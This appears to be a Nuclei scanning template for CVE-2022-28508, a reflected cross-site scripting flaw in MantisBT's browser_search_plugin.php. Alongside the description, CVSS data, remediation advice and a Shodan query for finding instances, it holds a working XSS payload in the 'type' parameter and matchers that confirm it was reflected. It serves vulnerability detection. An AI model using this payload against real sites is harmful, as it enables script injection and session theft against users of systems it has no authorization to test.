MantisBT before 2.25.2 contains a cross-site scripting vulnerability in browser_search_plugin.php. The application does not properly sanitize the 'type' parameter, which allows attackers to inject arbitrary web script or HTML via a crafted URL.
PoC代码[已公开]
id: CVE-2022-28508
info:
name: MantisBT < 2.25.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
MantisBT before 2.25.2 contains a cross-site scripting vulnerability in browser_search_plugin.php. The application does not properly sanitize the 'type' parameter, which allows attackers to inject arbitrary web script or HTML via a crafted URL.
impact: |
Successful exploitation allows attackers to execute arbitrary JavaScript code in the context of a victim's browser,potentially leading to session hijacking, credential theft, or phishing attacks.
remediation: |
Upgrade to MantisBT version 2.25.2 or later which contains the fix for this vulnerability.If upgrading is not immediately possible, restrict access to the browser_search_plugin.php endpoint.
reference:
- https://github.com/YavuzSahbaz/CVE-2022-28508/blob/main/MantisBT%202.25.2%20XSS%20vulnurability
- https://www.mantisbt.org/bugs/changelog_page.php
- https://nvd.nist.gov/vuln/detail/CVE-2022-28508
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-28508
cwe-id: CWE-79
epss-score: 0.01912
epss-percentile: 0.82649
metadata:
verified: true
max-request: 1
shodan-query: title:"MantisBT"
fofa-query: title="MantisBT"
tags: cve,cve2022,mantisbt,xss,opensearch
http:
- method: GET
path:
- "{{BaseURL}}/browser_search_plugin.php?type=text%27%22()%26%25<acx><ScRiPt>alert(document.domain)</ScRiPt>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "<ShortName>"
condition: and
- type: word
part: content_type
words:
- "application/opensearchdescription"
- type: status
status:
- 200
# digest: 490a004630440220663903c67ed4cb8825c1dc6b965ca6d947148bb523754b6427553a9726aa35cf02201cebe331c31698d2c31982e47cd6ca25c34f6e7768eec3ba30dc5c2283efddc5:922c64590222798bb761d5b6d8e72950